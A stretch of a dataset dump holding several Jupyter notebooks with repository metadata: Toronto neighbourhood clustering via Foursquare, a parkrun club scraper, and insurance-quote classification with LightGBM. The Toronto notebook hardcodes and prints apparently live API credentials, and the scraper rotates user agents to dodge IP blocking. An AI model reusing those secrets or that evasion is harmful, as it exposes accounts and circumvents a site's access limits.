"import numpy as np # library to handle data in a vectorized manner\n\nimport pandas as pd # library for data analsysis\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\n\nimport json # library to handle JSON files\n\n#!conda install -c conda-forge geopy --yes # uncomment this line if you haven't completed the Foursquare API lab\nfrom geopy.geocoders import Nominatim # convert an address into latitude and longitude values\n\nimport requests # library to handle requests\nfrom pandas.io.json import json_normalize # tranform JSON file into a pandas dataframe\n\n# Matplotlib and associated plotting modules\nimport matplotlib.cm as cm\nimport matplotlib.colors as colors\n\n# import k-means from clustering stage\nfrom sklearn.cluster import KMeans\n\nimport folium # map rendering library\n\n\n\n",
"_____no_output_____"
]
],
[
[
"### Scraping the Data\n\nUse the Notebook to build the code to scrape the following Wikipedia page, https://en.wikipedia.org/wiki/List_of_postal_codes_of_Canada:_M, in order to obtain the data that is in the table of postal codes and to transform the data into a pandas dataframe like the one shown below:",
"_____no_output_____"
]
],
[
[
"toronto='https://en.wikipedia.org/wiki/List_of_postal_codes_of_Canada:_M'",
"_____no_output_____"
],
[
"df = pd.read_html(toronto, header=0)[0]",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
]
],
[
[
"### Eliminating cells with a borough that is Not assigned\n\nOnly process the cells that have an assigned borough. Ignore cells with a borough that is Not assigned.",
"_____no_output_____"
]
],
[
[
"df.drop(df[df['Borough']==\"Not assigned\"].index,axis=0, inplace=True)",
"_____no_output_____"
]
],
[
[
"### Grouping by Postal Code\n\nMore than one neighborhood can exist in one postal code area. For example, in the table on the Wikipedia page, you will notice that M5A is listed twice and has two neighborhoods: Harbourfront and Regent Park. These two rows will be combined into one row with the neighborhoods separated with a comma as shown in row 11 in the above table.",
"_____no_output_____"
]
],
[
[
"df1=df.groupby('Postcode')['Neighbourhood'].agg(lambda x: ','.join(x)) \ndf3=pd.DataFrame(df1)\ndf3.reset_index().head()",
"_____no_output_____"
],
[
"df2=df.groupby('Postcode')['Borough'].unique()\ndf4=pd.DataFrame(df2)\ndf4.reset_index().head()\n\ndf4['Borough']=[df4['Borough'][i][0] for i in range(df4.shape[0])]\ndf4.reset_index().head()",
"_____no_output_____"
],
[
"df4['Neighbourhood']=df3['Neighbourhood']",
"_____no_output_____"
],
[
"df4.reset_index().head()",
"_____no_output_____"
],
[
"df4.loc[df4['Neighbourhood']==\"Not assigned\",'Neighbourhood']=df4.loc[df4['Neighbourhood']==\"Not assigned\",'Borough']\n",
"_____no_output_____"
],
[
"df4.reset_index().head()",
"_____no_output_____"
],
[
"df4.shape",
"_____no_output_____"
]
],
[
[
"### Including the Latitude and Longitude to the Dataframe\n\nNow in order to utilize the Foursquare location data, we need to get the latitude and the longitude coordinates of each neighborhood.",
"_____no_output_____"
]
],
[
[
"coords=r'http://cocl.us/Geospatial_data'",
"_____no_output_____"
],
[
"coord_df=pd.read_csv(coords)",
"_____no_output_____"
],
[
"df4['Latitude']=coord_df['Latitude'].values\ndf4['Longitude']=coord_df['Longitude'].values",
"_____no_output_____"
],
[
"df4.reset_index().head()",
"_____no_output_____"
]
],
[
[
"### Explore and cluster the neighborhoods in Toronto.",
"_____no_output_____"
]
],
[
[
"import folium\n\nCLIENT_ID = 'IVUX2ATVRIVIAT3MYAOI3BNB0N5X2BCPEGK3W0FCX5RNN1HN' # my Foursquare ID\nCLIENT_SECRET = '1UKWCBE54WZK50IHDYJXAK3GJCXPGQELW5QE30LXCGRA4MG2' # my Foursquare Secret\nVERSION = '20180605' # Foursquare API version\n\nprint('Your credentails:')\nprint('CLIENT_ID: ' + CLIENT_ID)\nprint('CLIENT_SECRET:' + CLIENT_SECRET)",
"Your credentails:\nCLIENT_ID: IVUX2ATVRIVIAT3MYAOI3BNB0N5X2BCPEGK3W0FCX5RNN1HN\nCLIENT_SECRET:1UKWCBE54WZK50IHDYJXAK3GJCXPGQELW5QE30LXCGRA4MG2\n"
],
[
"def getNearbyVenues(names, latitudes, longitudes, radius=500):\n \n venues_list=[]\n for name, lat, lng in zip(names, latitudes, longitudes):\n print(name)\n \n # create the API request URL\n url = 'https://api.foursquare.com/v2/venues/explore?&client_id={}&client_secret={}&v={}&ll={},{}&radius={}&limit={}'.format(\n CLIENT_ID, \n CLIENT_SECRET, \n VERSION, \n lat, \n lng, \n radius, \n LIMIT)\n \n # make the GET request\n results = requests.get(url).json()[\"response\"]['groups'][0]['items']\n \n # return only relevant information for each nearby venue\n venues_list.append([(\n name, \n lat, \n lng, \n v['venue']['name'], \n v['venue']['location']['lat'], \n v['venue']['location']['lng'], \n v['venue']['categories'][0]['name']) for v in results])\n\n nearby_venues = pd.DataFrame([item for venue_list in venues_list for item in venue_list])\n nearby_venues.columns = ['Neighbourhood', \n 'Neighbourhood Latitude', \n 'Neighbourhood Longitude', \n 'Venue', \n 'Venue Latitude', \n 'Venue Longitude', \n 'Venue Category']\n \n return(nearby_venues)",
"_____no_output_____"
],
[
"LIMIT=100\ntoronto_venues = getNearbyVenues(names=df4['Neighbourhood'],\n latitudes=df4['Latitude'],\n longitudes=df4['Longitude']\n )",
"Rouge,Malvern\nHighland Creek,Rouge Hill,Port Union\nGuildwood,Morningside,West Hill\nWoburn\nCedarbrae\nScarborough Village\nEast Birchmount Park,Ionview,Kennedy Park\nClairlea,Golden Mile,Oakridge\nCliffcrest,Cliffside,Scarborough Village West\nBirch Cliff,Cliffside West\nDorset Park,Scarborough Town Centre,Wexford Heights\nMaryvale,Wexford\nAgincourt\nClarks Corners,Sullivan,Tam O'Shanter\nAgincourt North,L'Amoreaux East,Milliken,Steeles East\nL'Amoreaux West\nUpper Rouge\nHillcrest Village\nFairview,Henry Farm,Oriole\nBayview Village\nSilver Hills,York Mills\nNewtonbrook,Willowdale\nWillowdale South\nYork Mills West\nWillowdale West\nParkwoods\nDon Mills North\nFlemingdon Park,Don Mills South\nBathurst Manor,Downsview North,Wilson Heights\nNorthwood Park,York University\nCFB Toronto,Downsview East\nDownsview West\nDownsview Central\nDownsview Northwest\nVictoria Village\nWoodbine Gardens,Parkview Hill\nWoodbine Heights\nThe Beaches\nLeaside\nThorncliffe Park\nEast Toronto\nThe Danforth West,Riverdale\nThe Beaches West,India Bazaar\nStudio District\nLawrence Park\nDavisville North\nNorth Toronto West\nDavisville\nMoore Park,Summerhill East\nDeer Park,Forest Hill SE,Rathnelly,South Hill,Summerhill West\nRosedale\nCabbagetown,St. James Town\nChurch and Wellesley\nHarbourfront,Regent Park\nRyerson,Garden District\nSt. James Town\nBerczy Park\nCentral Bay Street\nAdelaide,King,Richmond\nHarbourfront East,Toronto Islands,Union Station\nDesign Exchange,Toronto Dominion Centre\nCommerce Court,Victoria Hotel\nBedford Park,Lawrence Manor East\nRoselawn\nForest Hill North,Forest Hill West\nThe Annex,North Midtown,Yorkville\nHarbord,University of Toronto\nChinatown,Grange Park,Kensington Market\nCN Tower,Bathurst Quay,Island airport,Harbourfront West,King and Spadina,Railway Lands,South Niagara\nStn A PO Boxes 25 The Esplanade\nFirst Canadian Place,Underground city\nLawrence Heights,Lawrence Manor\nGlencairn\nHumewood-Cedarvale\nCaledonia-Fairbanks\nChristie\nDovercourt Village,Dufferin\nLittle Portugal,Trinity\nBrockton,Exhibition Place,Parkdale Village\nDownsview,North Park,Upwood Park\nDel Ray,Keelesdale,Mount Dennis,Silverthorn\nThe Junction North,Runnymede\nHigh Park,The Junction South\nParkdale,Roncesvalles\nRunnymede,Swansea\nQueen's Park\nCanada Post Gateway Processing Centre\nBusiness Reply Mail Processing Centre 969 Eastern\nHumber Bay Shores,Mimico South,New Toronto\nAlderwood,Long Branch\nThe Kingsway,Montgomery Road,Old Mill North\nHumber Bay,King's Mill Park,Kingsway Park South East,Mimico NE,Old Mill South,The Queensway East,Royal York South East,Sunnylea\nKingsway Park South West,Mimico NW,The Queensway West,Royal York South West,South of Bloor\nIslington Avenue\nCloverdale,Islington,Martin Grove,Princess Gardens,West Deane Park\nBloordale Gardens,Eringate,Markland Wood,Old Burnhamthorpe\nHumber Summit\nEmery,Humberlea\nWeston\nWestmount\nKingsview Village,Martin Grove Gardens,Richview Gardens,St. Phillips\nAlbion Gardens,Beaumond Heights,Humbergate,Jamestown,Mount Olive,Silverstone,South Steeles,Thistletown\nNorthwest\n"
],
[
"toronto_venues.groupby('Neighbourhood').count().head()",
"_____no_output_____"
],
[
"print('There are {} uniques categories.'.format(len(toronto_venues['Venue Category'].unique())))",
"There are 272 uniques categories.\n"
]
],
[
[
"#### Encoding the variables",
"_____no_output_____"
]
],
[
[
"# one hot encoding\ntoronto_onehot = pd.get_dummies(toronto_venues[['Venue Category']], prefix=\"\", prefix_sep=\"\")\n\n# add neighborhood column back to dataframe\ntoronto_onehot['Neighbourhood'] = toronto_venues['Neighbourhood'] \n\n# move neighborhood column to the first column\nfixed_columns = [toronto_onehot.columns[-1]] + list(toronto_onehot.columns[:-1])\ntoronto_onehot = toronto_onehot[fixed_columns]\ntoronto_grouped = toronto_onehot.groupby('Neighbourhood').mean().reset_index()",
"_____no_output_____"
],
[
"num_top_venues = 5\n\nfor hood in toronto_grouped['Neighbourhood']:\n #print(\"----\"+hood+\"----\")\n temp = toronto_grouped[toronto_grouped['Neighbourhood'] == hood].T.reset_index()\n temp.columns = ['venue','freq']\n temp = temp.iloc[1:]\n temp['freq'] = temp['freq'].astype(float)\n temp = temp.round({'freq': 2})\n #print(\n temp.sort_values('freq', ascending=False).reset_index(drop=True).head(num_top_venues)\n # print('\\n')",
"_____no_output_____"
],
[
"def return_most_common_venues(row, num_top_venues):\n row_categories = row.iloc[1:]\n row_categories_sorted = row_categories.sort_values(ascending=False)\n \n return row_categories_sorted.index.values[0:num_top_venues]",
"_____no_output_____"
],
[
"num_top_venues = 10\n\nindicators = ['st', 'nd', 'rd']\n\n# create columns according to number of top venues\ncolumns = ['Neighbourhood']\nfor ind in np.arange(num_top_venues):\n try:\n columns.append('{}{} Most Common Venue'.format(ind+1, indicators[ind]))\n except:\n columns.append('{}th Most Common Venue'.format(ind+1))\n\n# create a new dataframe\nneighborhoods_venues_sorted = pd.DataFrame(columns=columns)\nneighborhoods_venues_sorted['Neighbourhood'] = toronto_grouped['Neighbourhood']\n\nfor ind in np.arange(toronto_grouped.shape[0]):\n neighborhoods_venues_sorted.iloc[ind, 1:] = return_most_common_venues(toronto_grouped.iloc[ind, :], num_top_venues)\n\nneighborhoods_venues_sorted.head()",
"_____no_output_____"
]
],
[
[
"### K Clusters",
"_____no_output_____"
]
],
[
[
"# set number of clusters\nkclusters = 7\n\ntoronto_grouped_clustering = toronto_grouped.drop('Neighbourhood', 1)\n\n# run k-means clustering\nkmeans = KMeans(n_clusters=kclusters, random_state=0).fit(toronto_grouped_clustering)\n\n# check cluster labels generated for each row in the dataframe\nkmeans.labels_[0:10] ",
"_____no_output_____"
],
[
"# add clustering labels\nneighborhoods_venues_sorted.insert(0, 'Cluster Labels', kmeans.labels_)\n\ntoronto_merged = df4\n\n# merge toronto_grouped with toronto_data to add latitude/longitude for each neighborhood\ntoronto_merged = toronto_merged.join(neighborhoods_venues_sorted.set_index('Neighbourhood'), on='Neighbourhood')\n",
"_____no_output_____"
],
[
"toronto_merged.reset_index()",
"_____no_output_____"
],
[
"toronto_merged.dropna(inplace=True)",
"_____no_output_____"
],
[
"# create map\naddress='Toronto'\ngeolocator = Nominatim(user_agent=\"toronto_explorer\")\nlocation = geolocator.geocode(address)\nlatitude = location.latitude\nlongitude = location.longitude\nmap_clusters = folium.Map(location=[latitude, longitude], zoom_start=11)\n\n# set color scheme for the clusters\nx = np.arange(kclusters)\nys = [i + x + (i*x)**2 for i in range(kclusters)]\ncolors_array = cm.rainbow(np.linspace(0, 1, len(ys)))\nrainbow = [colors.rgb2hex(i) for i in colors_array]\n\n# add markers to the map\nmarkers_colors = []\nfor lat, lon, poi, cluster in zip(toronto_merged['Latitude'], toronto_merged['Longitude'], toronto_merged['Neighbourhood'], toronto_merged['Cluster Labels']):\n label = folium.Popup(str(poi) + ' Cluster ' + str(cluster), parse_html=True)\n folium.CircleMarker(\n [lat, lon],\n radius=5,\n popup=label,\n color=rainbow[int(cluster)-1],\n fill=True,\n fill_color=rainbow[int(cluster)-1],\n fill_opacity=0.7).add_to(map_clusters)\n \nmap_clusters",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb00c2cddd6874686ef98994d46c8f97985d95a3 | 29,553 | ipynb | Jupyter Notebook | clubmates.ipynb | vol1ura/parkrun_analysis | caae0833e6ed35404635efcff40b672c1e56d133 | [
"MIT"
] | null | null | null | clubmates.ipynb | vol1ura/parkrun_analysis | caae0833e6ed35404635efcff40b672c1e56d133 | [
"MIT"
] | null | null | null | clubmates.ipynb | vol1ura/parkrun_analysis | caae0833e6ed35404635efcff40b672c1e56d133 | [
"MIT"
] | null | null | null | 36.216912 | 232 | 0.448922 | [
[
[
"<a href=\"https://colab.research.google.com/github/vol1ura/parkrun_analysis/blob/master/clubmates.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport random\nimport re\nimport requests\nimport time\nfrom tqdm.notebook import tqdm\n\npd.set_option('display.max_rows', None)",
"_____no_output_____"
],
[
"%pip install random_user_agent",
"Collecting random_user_agent\n Downloading random_user_agent-1.0.1-py3-none-any.whl (8.2 MB)\n\u001b[K |████████████████████████████████| 8.2 MB 7.0 MB/s \n\u001b[?25hInstalling collected packages: random-user-agent\nSuccessfully installed random-user-agent-1.0.1\n"
],
[
"from random_user_agent.user_agent import UserAgent\n\nuser_agent_rotator = UserAgent()",
"_____no_output_____"
],
[
"club_id = 23212 # Wake&Run\nhome_parkrun = 'Kuzminki'",
"_____no_output_____"
],
[
"headers = {\n 'Host': 'www.parkrun.ru',\n 'User-Agent': user_agent_rotator.get_random_user_agent(),\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Connection': 'keep-alive',\n 'Upgrade-Insecure-Requests': '1',\n 'Sec-GPC': '1',\n 'TE': 'Trailers'\n}",
"_____no_output_____"
],
[
"page_all_results = requests.get('https://www.parkrun.ru/results/courserecords/', headers=headers)\ndata = pd.read_html(page_all_results.text)[0]\nrussian_parkruns = data[data.columns[0]]",
"_____no_output_____"
],
[
"dfs = []\nfor parkrun in tqdm(russian_parkruns):\n time.sleep(3 + 5*random.random())\n parkrun_trim = re.sub(r'[\\s-]', '', parkrun)\n url = f'https://www.parkrun.ru/{parkrun_trim}/results/clubhistory/?clubNum={club_id}'\n headers['User-Agent'] = user_agent_rotator.get_random_user_agent()\n club_results = requests.get(url, headers=headers)\n try:\n df = pd.read_html(club_results.text)[0]\n dfs.append(df[df.columns[0]])\n if parkrun == home_parkrun:\n home_list = df[df.columns[0]]\n except:\n print('ОШИБКА - операция завершилась досрочно. Паркран временно заблокировал IP.')\n break",
"_____no_output_____"
],
[
"def last_name_first(full_name: str):\n names = full_name.split()\n last_name = names.pop(1).capitalize()\n names.insert(0, last_name)\n return ' '.join(names)",
"_____no_output_____"
],
[
"full_list = pd.concat(dfs).drop_duplicates(keep='last')\nouter_home_list = pd.concat([full_list, home_list]).apply(last_name_first).sort_values().drop_duplicates(keep=False).reset_index(drop=True)",
"_____no_output_____"
]
],
[
[
"### Одноклубники, не бегавшие на домашнем паркране:",
"_____no_output_____"
]
],
[
[
"outer_home_list.shift(1, fill_value='________Фамилия_Имя___')",
"_____no_output_____"
]
],
[
[
"### Полный список одноклубников:",
"_____no_output_____"
]
],
[
[
"full_list.apply(last_name_first).sort_values().reset_index(drop=True).shift(1, fill_value='________Фамилия_Имя___')",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb00c3e83636471c0f7c44b7c652f4f878a6071c | 1,008 | ipynb | Jupyter Notebook | tensorflow_ml_model_example.ipynb | bavincen/notebooks | 4e3f45447101d86148f54857329bd79f4023df98 | [
"Apache-2.0"
] | null | null | null | tensorflow_ml_model_example.ipynb | bavincen/notebooks | 4e3f45447101d86148f54857329bd79f4023df98 | [
"Apache-2.0"
] | null | null | null | tensorflow_ml_model_example.ipynb | bavincen/notebooks | 4e3f45447101d86148f54857329bd79f4023df98 | [
"Apache-2.0"
] | null | null | null | 24.585366 | 242 | 0.52877 | [
[
[
"<a href=\"https://colab.research.google.com/github/bavincen/notebooks/blob/main/tensorflow_ml_model_example.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
]
] |
cb00cf7271c06e85150df444f463271d3da2f675 | 184,405 | ipynb | Jupyter Notebook | CEBD_1260_Machine_learning_Project_Dec03version.ipynb | mikeditri/CEBD_1260_Machine_learning_Project | a7cc1798df34e25c57988deb1832c07e147cff2d | [
"MIT"
] | null | null | null | CEBD_1260_Machine_learning_Project_Dec03version.ipynb | mikeditri/CEBD_1260_Machine_learning_Project | a7cc1798df34e25c57988deb1832c07e147cff2d | [
"MIT"
] | null | null | null | CEBD_1260_Machine_learning_Project_Dec03version.ipynb | mikeditri/CEBD_1260_Machine_learning_Project | a7cc1798df34e25c57988deb1832c07e147cff2d | [
"MIT"
] | null | null | null | 181.500984 | 30,276 | 0.886766 | [
[
[
"import numpy as np \nimport pandas as pd \nimport os\nimport gc\nimport seaborn as sns # for plotting graphs\nimport matplotlib.pyplot as plt # for plotting graphs aswell\nimport glob\nfrom datetime import datetime\nfrom sklearn.model_selection import train_test_split \nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import preprocessing\nfrom sklearn.metrics import log_loss,roc_auc_score\nfrom sklearn.preprocessing import OneHotEncoder\nfrom scipy.sparse import coo_matrix, hstack\nimport lightgbm\nfrom lightgbm import LGBMClassifier\nfrom sklearn.model_selection import KFold\n%matplotlib inline\n",
"_____no_output_____"
],
[
"# to display maximum rows and columns\npd.set_option('display.max_rows', None)\npd.set_option('display.max_columns', None)\n",
"_____no_output_____"
],
[
"# function to set all numerical data to int16 or float16, to save on memory use\ndef dtype_conver(Dataframe):\n for col in Dataframe:\n if Dataframe[col].dtype in ['float32','float64']:\n Dataframe[col] = Dataframe[col].astype(np.float16)\n if Dataframe[col].dtype in ['int32','float64']:\n Dataframe[col] = Dataframe[col].astype(np.int16)",
"_____no_output_____"
],
[
"#Parameters for lightGBM classification\nmodel_lgb = LGBMClassifier(\n n_jobs=4,\n n_estimators=100000,\n boost_from_average='false',\n learning_rate=0.02,\n num_leaves=64,\n num_threads=4,\n max_depth=7,\n tree_learner = \"serial\",\n feature_fraction = 0.7,\n bagging_freq = 5,\n bagging_fraction = 0.5,\n# min_data_in_leaf = 75,\n# min_sum_hessian_in_leaf = 50.0,\n silent=-1,\n verbose=-1,\n device='cpu',\n )",
"_____no_output_____"
],
[
"#Parameters for RFC classification\nclf = RandomForestClassifier(n_estimators=1000, max_depth=7,random_state=0,max_leaf_nodes=64,verbose=1,n_jobs=-1)",
"_____no_output_____"
],
[
"# import OneHotEncoder & define it\nfrom sklearn.preprocessing import OneHotEncoder\nohe = OneHotEncoder(categories = 'auto',sparse=True)",
"_____no_output_____"
],
[
"kf = KFold(n_splits=5, random_state=10, shuffle=True)",
"_____no_output_____"
],
[
"\ndef master_pipe(X_ohe,y):\n\n # place holder for k-fold scores\n scores = []\n\n # to differentiate files names produced by plt.savefig\n n = 1\n\n # model pipeline calculates model score and saves feature importance graph as .png file\n for i,(tr_idx, val_idx) in enumerate(kf.split(X_ohe,y)):\n print('Fold :{}'.format(i))\n tr_X = X_ohe[tr_idx] # training for this loop\n tr_y = y[tr_idx] #\n val_X = X_ohe[val_idx]# validation data for this loop\n val_y = y[val_idx]\n # here build your models\n model = model_lgb\n model.fit(tr_X, tr_y, eval_set=[(tr_X, tr_y), (val_X, val_y)], eval_metric = 'auc', verbose=100, \n early_stopping_rounds= 50)\n #picking best model?\n pred_val_y = model.predict_proba(val_X,num_iteration=model.best_iteration_)[:,1]\n #measuring model vs validation\n score = roc_auc_score(val_y,pred_val_y)\n scores.append(score)\n print('current performance by auc:{}'.format(score))\n lightgbm.plot_importance(model, ax=None, height=0.2, xlim=None, ylim=None, title='Feature importance', \n xlabel='Feature importance', ylabel='Features', importance_type='split',\n max_num_features=20, ignore_zero=True, figsize=None, grid=True, precision=3)\n # in python plots dir will be auto-created\n #plt.show()\n plt.savefig('..(in jupyter, point destination here and remove plots dir ->)plots/feature_importance{}.png'.format(n))\n plt.close()\n n=n+1",
"_____no_output_____"
],
[
"def master_pipe_RFC(X_ohe,y):\n # place holder for k-fold scores\n scores_rfc = []\n\n # model pipeline calculates model score and saves feature importance graph as .png file\n for i,(tr_idx, val_idx) in enumerate(kf.split(X_ohe,y)):\n print('Fold :{}'.format(i))\n tr_X = X_ohe[tr_idx] # training for this loop\n tr_y = y[tr_idx] #\n val_X = X_ohe[val_idx]# validation data for this loop\n val_y = y[val_idx]\n # here build your models\n model = clf\n model.fit(tr_X, tr_y)\n #picking best model?\n pred_val_y = model.predict(val_X)\n #measuring model vs validation\n score_rfc = roc_auc_score(val_y,pred_val_y)\n scores_rfc.append(score_rfc)\n print('current performance by auc:{}'.format(score_rfc))\n ",
"_____no_output_____"
],
[
"# Read in filepath \nDATA_PATH = r'C:/Users/t891199/Desktop/Big_Data_Diploma/CEBD_1260_Machine_learning/Data Files/Class_3/'\nfile_name = os.path.join(DATA_PATH,'train.csv')\n",
"_____no_output_____"
],
[
"# pandas reads in csv file using filepath\nold_train_df = pd.read_csv(file_name)\nprint(old_train_df.shape)\n#original_quote_date is time-series",
"(260753, 299)\n"
],
[
"#Feature Engineering\nold_train_df['Original_Quote_Date'] = pd.to_datetime(old_train_df['Original_Quote_Date'])\nold_train_df['year'] = old_train_df['Original_Quote_Date'].dt.year\nold_train_df['month'] = old_train_df['Original_Quote_Date'].dt.month\nold_train_df['day'] = old_train_df['Original_Quote_Date'].dt.day\ntrain_df = old_train_df.drop([\"Original_Quote_Date\"], axis = 1)",
"_____no_output_____"
],
[
"# lets see how many NaN or Null values are in each column\nnan_info = pd.DataFrame(train_df.isnull().sum()).reset_index()\nnan_info.columns = ['col','nan_cnt']\n",
"_____no_output_____"
],
[
"#sort them in descending order and print 1st 10\nnan_info.sort_values(by = 'nan_cnt',ascending=False,inplace=True)\nnan_info.head(10)",
"_____no_output_____"
],
[
"# extract column names with NaNs and Nulls\n# in numerical cols\nnum_cols_with_missing = ['PersonalField84','PropertyField29']\n\n",
"_____no_output_____"
],
[
"# extract column names with NaNs and Nulls\n# in boolean type cols\nbool_cols_with_missing = ['PropertyField3','PropertyField4','PersonalField7','PropertyField32',\n 'PropertyField34','PropertyField36','PropertyField38']\n",
"_____no_output_____"
],
[
"# fill in null and NaN values with 'U' in boolean type cols ( 'Y','N')\nfor cols in bool_cols_with_missing:\n train_df[cols].fillna('U',inplace=True)\n\n",
"_____no_output_____"
],
[
"# fill in null and NaN values with -1 in numerical missing values\nfor cols in num_cols_with_missing:\n train_df[cols].fillna(-1, inplace=True)\n",
"_____no_output_____"
],
[
"# define target\ny = old_train_df[\"QuoteConversion_Flag\"].values",
"_____no_output_____"
],
[
"# drop target column from data\n# and static columns GeographicField10A & PropertyField6\nX = train_df.drop([\"QuoteConversion_Flag\",\"GeographicField10A\",\"PropertyField6\"], axis = 1)\n",
"_____no_output_____"
],
[
"#QuoteNumber setting as index\nX = X.set_index(\"QuoteNumber\")",
"_____no_output_____"
],
[
"dtype_conver(X)",
"_____no_output_____"
],
[
"# select all columns that are categorical i.e with unique categories less than 40 in our case\nX_for_ohe = [cols for cols in X.columns if X[cols].nunique() < 40 or X[cols].dtype in['object']]\nX_not_ohe = [cols for cols in X.columns if X[cols].nunique() > 40 and X[cols].dtype not in['object']]\n",
"_____no_output_____"
],
[
"#numerical column that we will not encode\nX[X_not_ohe].head()\n",
"_____no_output_____"
],
[
"#to keep track of our columns, how many are remaining after we removed 4 so far?\nlen(X_for_ohe)",
"_____no_output_____"
],
[
"X['SalesField8'].head()",
"_____no_output_____"
],
[
"nan_info = pd.DataFrame(X[X_for_ohe].isnull().sum()).reset_index()\nnan_info.columns = ['col','nan_cnt']",
"_____no_output_____"
],
[
"#sort them in descending order and print 1st 10\nnan_info.sort_values(by = 'nan_cnt',ascending=False,inplace=True)\nnan_info.head(10)",
"_____no_output_____"
],
[
"# apply OneHotEncoder on categorical feature columns\nX_ohe = ohe.fit_transform(X[X_for_ohe])\n",
"_____no_output_____"
],
[
"# we are pretty much done for now here, apparently we can set 'sparse = True' in OneHotEncoder and we get a \n#csr_matrix. I left it as false so that you can see the sparse matrix\nX_ohe\n",
"_____no_output_____"
],
[
"# SalesField8 was kept out of sparse matrix, now we need to bring it back\n# scaledown SalesField8 for easy handling using log(), then convert to float16\nSF8 = np.log(X['SalesField8']).astype(np.float16)\nhstack((X_ohe,np.array(SF8)[:,None]))",
"_____no_output_____"
],
[
"# lets get the model k-fold scores for RFC\nmaster_pipe_RFC(X_ohe,y)",
"Fold :0\n"
],
[
"# lets get the model k-fold scores and print feature importance graphs\nmaster_pipe(X_ohe,y)\n",
"Fold :0\nTraining until validation scores don't improve for 50 rounds\n[100]\ttraining's auc: 0.956316\ttraining's binary_logloss: 0.237383\tvalid_1's auc: 0.954839\tvalid_1's binary_logloss: 0.236975\n[200]\ttraining's auc: 0.960422\ttraining's binary_logloss: 0.190373\tvalid_1's auc: 0.958327\tvalid_1's binary_logloss: 0.191157\n[300]\ttraining's auc: 0.963752\ttraining's binary_logloss: 0.178257\tvalid_1's auc: 0.960374\tvalid_1's binary_logloss: 0.181383\n[400]\ttraining's auc: 0.966979\ttraining's binary_logloss: 0.170736\tvalid_1's auc: 0.961703\tvalid_1's binary_logloss: 0.17723\n[500]\ttraining's auc: 0.969755\ttraining's binary_logloss: 0.164646\tvalid_1's auc: 0.962475\tvalid_1's binary_logloss: 0.174834\n[600]\ttraining's auc: 0.972186\ttraining's binary_logloss: 0.159703\tvalid_1's auc: 0.963093\tvalid_1's binary_logloss: 0.173345\n[700]\ttraining's auc: 0.974324\ttraining's binary_logloss: 0.155456\tvalid_1's auc: 0.963332\tvalid_1's binary_logloss: 0.172668\n[800]\ttraining's auc: 0.97621\ttraining's binary_logloss: 0.151465\tvalid_1's auc: 0.96358\tvalid_1's binary_logloss: 0.171897\n[900]\ttraining's auc: 0.977943\ttraining's binary_logloss: 0.147589\tvalid_1's auc: 0.963791\tvalid_1's binary_logloss: 0.171234\n[1000]\ttraining's auc: 0.979447\ttraining's binary_logloss: 0.144307\tvalid_1's auc: 0.963923\tvalid_1's binary_logloss: 0.170845\n[1100]\ttraining's auc: 0.98094\ttraining's binary_logloss: 0.140879\tvalid_1's auc: 0.964069\tvalid_1's binary_logloss: 0.170391\n[1200]\ttraining's auc: 0.982274\ttraining's binary_logloss: 0.137752\tvalid_1's auc: 0.964191\tvalid_1's binary_logloss: 0.170092\n[1300]\ttraining's auc: 0.983545\ttraining's binary_logloss: 0.134781\tvalid_1's auc: 0.964252\tvalid_1's binary_logloss: 0.169933\nEarly stopping, best iteration is:\n[1265]\ttraining's auc: 0.98315\ttraining's binary_logloss: 0.135754\tvalid_1's auc: 0.96426\tvalid_1's binary_logloss: 0.169942\ncurrent performance by auc:0.9642597680554159\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb00d624ca30478d61a4f4d58505fbb1a3761a1f | 29,611 | ipynb | Jupyter Notebook | matrix_one/day3.ipynb | mattzajac/dw_matrix | 16763c44f6c46fc06d0a4a10b5467cc6f0eeaa92 | [
"MIT"
] | null | null | null | matrix_one/day3.ipynb | mattzajac/dw_matrix | 16763c44f6c46fc06d0a4a10b5467cc6f0eeaa92 | [
"MIT"
] | null | null | null | matrix_one/day3.ipynb | mattzajac/dw_matrix | 16763c44f6c46fc06d0a4a10b5467cc6f0eeaa92 | [
"MIT"
] | null | null | null | 29,611 | 29,611 | 0.656986 | [
[
[
"#!pip install datadotworld\n#!pip install datadotworld[pandas]",
"_____no_output_____"
],
[
"#!dw configure",
"_____no_output_____"
],
[
"from google.colab import drive\nimport datadotworld as dw\n\nimport pandas as pd\nimport numpy as np",
"_____no_output_____"
],
[
"#drive.mount('/content/drive')",
"_____no_output_____"
],
[
"cd 'drive/My Drive/Colab Notebooks/dw_matrix'",
"/content/drive/My Drive/Colab Notebooks/dw_matrix\n"
],
[
"ls matrix_one",
